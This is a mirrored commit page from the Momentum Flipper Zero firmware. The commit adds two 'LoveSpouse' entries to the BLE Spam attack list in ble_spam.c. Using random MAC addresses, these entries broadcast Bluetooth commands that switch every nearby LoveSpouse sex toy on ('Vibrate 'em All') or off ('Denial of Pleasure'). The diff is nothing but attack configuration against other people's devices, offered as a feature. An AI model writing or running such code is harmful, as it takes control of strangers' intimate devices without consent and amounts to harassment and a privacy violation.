mirror of
https://github.com/Next-Flip/Momentum-Firmware.git
synced 2026-05-17 04:34:44 -07:00
Add Love Spouse toys to BLE Spam
First discovered by @mandomat
This commit is contained in:
26
applications/external/ble_spam/ble_spam.c
vendored
26
applications/external/ble_spam/ble_spam.c
vendored
@@ -108,6 +108,32 @@ static Attack attacks[] = {
|
||||
.cfg.swiftpair = {},
|
||||
},
|
||||
},
|
||||
{
|
||||
.title = "Vibrate 'em All",
|
||||
.text = "Activate all LoveSpouse toys",
|
||||
.protocol = &protocol_lovespouse,
|
||||
.payload =
|
||||
{
|
||||
.random_mac = true,
|
||||
.cfg.lovespouse =
|
||||
{
|
||||
.state = LovespouseStatePlay,
|
||||
},
|
||||
},
|
||||
},
|
||||
{
|
||||
.title = "Denial of Pleasure",
|
||||
.text = "Disable all LoveSpouse toys",
|
||||
.protocol = &protocol_lovespouse,
|
||||
.payload =
|
||||
{
|
||||
.random_mac = true,
|
||||
.cfg.lovespouse =
|
||||
{
|
||||
.state = LovespouseStateStop,
|
||||
},
|
||||
},
|
||||
},
|
||||
};
|
||||
|
||||
#define ATTACKS_COUNT ((signed)COUNT_OF(attacks))
|
||||
|
||||
Reference in New Issue
Block a user